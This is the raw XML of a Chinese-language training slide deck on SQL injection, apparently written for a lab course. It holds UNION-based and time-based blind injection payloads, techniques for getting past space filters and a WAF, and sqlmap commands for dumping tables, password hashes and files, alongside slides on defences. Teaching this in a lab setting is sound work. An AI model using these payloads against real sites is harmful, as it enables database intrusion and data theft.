            <a:off x="669923" y="3788161"/>
            <a:ext cx="809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6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询表名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73FA04-BCB7-4CCE-87C4-0B6F49F83FFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700706" y="4222668"/>
            <a:ext cx="98973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and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制编码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>limit 1,1/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据库的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进制编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/*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848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2B543-8D4B-41E1-AF94-C6AABCF8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php+mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入流程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BA2707-76A2-4B1D-B0E6-BFD513F3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EA0C46-CAB1-4332-9E84-FB9E0B38112F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1259174"/>
            <a:ext cx="947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7.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询字段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CC8011-B649-44E2-895F-860AD2F5243F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1671503"/>
            <a:ext cx="10850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1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=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表名的十六进制编码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table_schema=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数据库的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进制编码 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limit 1,1/*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CFF1C5-3BBE-42B3-AC8E-CA38996C2904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="2317834"/>
            <a:ext cx="1006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8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询数据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D5B5E77-2B75-4A06-B9E0-5BF9D92F2482}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="2775971"/>
            <a:ext cx="8923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1=2 union select 1,2,3,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1,5,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2,7,8 from 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069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F128F-87B3-456D-94AE-564673332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注入实例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70DC01-4CAC-4E58-BC9D-A91FBE4B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8BB7C3-10B5-44AB-8274-67F394F9881E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1532467"/>
            <a:ext cx="1085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见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文档</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107828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EB989-C948-4FEE-B4ED-87BDC85D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注入绕过讲解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AF793-A924-4384-ABF8-5B8D13CD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0548DF-7E0A-441A-98EE-1C8DEE8E5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060" y="2277196"/>
            <a:ext cx="5409811" cy="422229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AC368DA-810C-4306-853D-5DA5EA02CA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1261533"/>
            <a:ext cx="584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当服务器 限制提交关键字符时候绕过方式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D290F3-8AC5-4440-8805-4647C5F3664F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1630865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过滤空格时候</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p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5AD40B7-52B3-4F08-A37C-7F339BB867A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203200" y="218486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Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、水平制表</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(HT) url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>编码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>%09</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、注释绕过空格   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注释*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>、括号绕过空格的方法，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>time based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>盲注中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.php?id=(sleep(ascii(mid(user()from(2)for(1)))=109)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-C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4.-100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3899157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9E938-5F0C-4D35-B850-E2847D64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注入加固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2D1327-2273-4BC9-B253-21745BA3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E780AE-E73E-4DC5-9C32-02726E2788BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1543565"/>
            <a:ext cx="584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防范手段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户输入过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不信任用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>严格对用户输入进行检查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r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51A1B1-42C3-443C-A722-D7DA1410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205" y="1382860"/>
            <a:ext cx="4952381" cy="17142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6244512-8B72-451B-994D-908FB1DE4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67" y="3124200"/>
            <a:ext cx="6328767" cy="292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1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074DF-42BA-4FED-877F-97D07C36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中间人攻击实验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1818A1-B251-43A4-94CD-486C0F37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212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74A90-4238-461D-BE28-DA15DA34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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入测试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C506B-7C35-4816-BA88-AEFC6138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D08B0C-7C3F-4A59-A6C1-F5601C6B2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407857"/>
            <a:ext cx="9980952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488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8B804-F0BD-42D9-B912-45594398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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入教程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A892D-563B-4948-AE03-1B0026F9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B7CB7E-2CB1-4D87-A25C-30BF610D7E58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1195275"/>
            <a:ext cx="10058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sqlmap.py -u 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注入点 </a:t>
            </a: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--current-user # /*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获取当前用户名称</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:b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sqlmap.py -u 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注入点 </a:t>
            </a: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--current-db  #  /*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获取当前数据库名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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sqlmap.py -u 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注入点 </a:t>
            </a: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--tables # /*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获取所有表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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sqlmap.py -u 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注入点 </a:t>
            </a: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–D exercises --tables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:b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sqlmap.py -u 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注入点 </a:t>
            </a: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 "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数据库名</a:t>
            </a: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-T "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--columns</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:b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sqlmap.py -u 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注入点 </a:t>
            </a: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-D "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数据库名</a:t>
            </a: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-T "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表名</a:t>
            </a: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-C "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字段</a:t>
            </a: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--dump</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:b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sqlmap.py -u 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注入点 </a:t>
            </a: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--file-read "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"#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读取文件</a:t>
            </a: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load_file()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:b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sqlmap.py -u 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注入点 </a:t>
            </a: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--is-dba #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是否是数据库管理员</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:b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sqlmap.py -u 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注入点 </a:t>
            </a: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--passwords #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数据库用户密码</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:b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sqlmap.py -u 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注入点 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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--current-user # /*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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获取当前用户名称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A831B2-945B-4307-83E2-EE80C052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4090289"/>
            <a:ext cx="10600000" cy="504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DA8098-789C-436D-A262-B8CDA809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190" y="1567429"/>
            <a:ext cx="4154410" cy="165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878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EAEB7-D9F0-4BF8-B705-F9DCF472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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>waf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8C7201-B3D4-4DE2-9888-F81BB5AA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3BFDD6-A0D0-499A-BDF2-3CCFA752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633D47-B5E2-47FA-8573-14714CC44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399676"/>
            <a:ext cx="11347220" cy="4531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0D7EAE-C9A3-4E3B-8FFD-44B236D82E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="2057400"/>
            <a:ext cx="11347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路径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C9EBB65-F5CE-4128-BCBE-5FC7CCCA1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631278"/>
            <a:ext cx="10571428" cy="65714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641ACC-AF2F-4A07-947A-6291D944EFA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="3522133"/>
            <a:ext cx="1057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tamper  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>点我看解释</a:t>
            </a:r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6B356F8-E565-47DA-8010-B735E7D1B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4" y="3850510"/>
            <a:ext cx="8239476" cy="23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87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D6DF2-F4E9-4EE7-BFA0-F08E2E1F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课后作业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C27BC-DE55-4CDB-AD4A-69A9149A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489710-08D6-44C7-B6CD-6BBAF554539F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="770467" y="1380067"/>
            <a:ext cx="7408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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入引发的血案，见实验环境</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2354900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2700" b="0"/>
              <a:t>thanks</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2700" b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23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1F7D8F-F4EC-4835-A10C-16364B9C02B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="514350"/>
            <a:ext cx="3874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/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>脚本练习</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="142280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A7A78-CBD6-4457-B4C6-4F87F77C2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红亚靶场讲解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AD0EB4-80D5-416E-A086-40E288C8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28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5EA35-30C6-40DB-AC0E-3ACA00C9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环境准备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89A6A3-A23C-4003-8C5F-AB8EDB39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AE94CA-1377-4C0A-875A-B868456C4606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795867" y="1447800"/>
            <a:ext cx="1109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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搭建 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php+mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试环境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asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>小旋风搭建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实验环境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A09BA0-6B87-44DA-99B3-649D5F91B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3206727"/>
            <a:ext cx="8771428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11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B2A8B8-4D91-438B-8035-4060AC8E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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入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F914B2-BFE1-4628-903B-C8E22543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1B98B11-0C97-402B-8F5E-48CB7DC21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24" y="1700324"/>
            <a:ext cx="11111596" cy="345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839324-507B-4927-BF48-84152FC3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sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入危害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2CCBEE-05F5-427D-908F-56C72F31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177D2B-E311-43E9-8AC5-8757F1A6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57" y="1221347"/>
            <a:ext cx="9404443" cy="441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61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CF8BA-024A-45CA-B9CB-E2740CDD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哪里存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入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BAD1C9-80E5-4634-B461-0DF96261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A883C0B-1FF0-497E-A7A3-466067CDE8B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1618938"/>
            <a:ext cx="108505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1.GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4.Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>任何客户端可控，传递到服务器的变量。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="522846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95c9de48-0f76-44ec-9d4a-88920333c5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RDRI TOOLS" val="Nordri Tools"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="主题5">
  <a:themeElements>
    <a:clrScheme name="016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34F56"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="F34F56"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="5A6C90"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="434F5A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="A5A5A5"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="44546A"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="F34F56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781</TotalTime>
  <Words>1039</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>195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楷体_GB2312</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>主题5</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>本章内容</vt:lpstr>
      <vt:lpstr>中间人攻击实验</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>红亚靶场讲解</vt:lpstr>
      <vt:lpstr>环境准备</vt:lpstr>
      <vt:lpstr>什么是sql注入</vt:lpstr>
      <vt:lpstr>sql注入危害</vt:lpstr>
      <vt:lpstr>哪里存在sql注入</vt:lpstr>
      <vt:lpstr>sql注入分类</vt:lpstr>
      <vt:lpstr>如何判断sql注入</vt:lpstr>
      <vt:lpstr>sql注入常见场景</vt:lpstr>
      <vt:lpstr>mysql语句讲解</vt:lpstr>
      <vt:lpstr>mysql讲解</vt:lpstr>
      <vt:lpstr>mysql讲解</vt:lpstr>
      <vt:lpstr>sql注入判断数据库类型</vt:lpstr>
      <vt:lpstr>asp+access注入实例</vt:lpstr>
      <vt:lpstr>asp+access注入实例</vt:lpstr>
      <vt:lpstr>asp+access注入实例</vt:lpstr>
      <vt:lpstr>asp+access注入实例</vt:lpstr>
      <vt:lpstr>asp+access实例</vt:lpstr>
      <vt:lpstr>php+mysql注入实例</vt:lpstr>
      <vt:lpstr>mysql注入技巧</vt:lpstr>
      <vt:lpstr>php+mysql注入实例 流程</vt:lpstr>
      <vt:lpstr>php+mysql注入流程</vt:lpstr>
      <vt:lpstr>php+mysql注入流程</vt:lpstr>
      <vt:lpstr>sql注入实例</vt:lpstr>
      <vt:lpstr>sql注入绕过讲解</vt:lpstr>
      <vt:lpstr>sql注入加固</vt:lpstr>
      <vt:lpstr>使用sqlmap进行sql注入测试</vt:lpstr>
      <vt:lpstr>sqlmap注入教程</vt:lpstr>
      <vt:lpstr>sqlmap绕过waf</vt:lpstr>
      <vt:lpstr>课后作业</vt:lpstr>
      <vt:lpstr>thanks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YA DAI</cp:lastModifiedBy>
  <cp:revision>137</cp:revision>
  <cp:lastPrinted>2017-08-20T16:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-20T16:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-03T07:13:12Z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95c9de48-0f76-44ec-9d4a-88920333c593</vt:lpwstr>
  </property>
</Properties>
</file>